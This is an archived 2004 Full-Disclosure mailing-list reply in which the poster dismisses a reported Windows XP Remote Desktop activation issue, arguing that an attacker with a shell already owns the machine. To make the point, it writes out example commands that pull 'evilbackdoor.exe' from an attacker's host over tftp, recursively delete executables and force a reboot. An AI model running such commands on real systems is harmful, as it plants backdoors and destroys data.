|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
From: morning_wood (se_cur_ity
hotmail.com)
Date: Sat Oct 02 2004 - 11:05:25 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> a malicious user who has already gained a command shell to activate
umm... you already own the box.
try...
tftp -i yourhost get evilbackdoor.exe ( vnc mabey )
or
c:\del *.exe /s
c:\shutdown -r
I realy do not see the SECURITY ISSUE here.
cheers,
m.wood
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]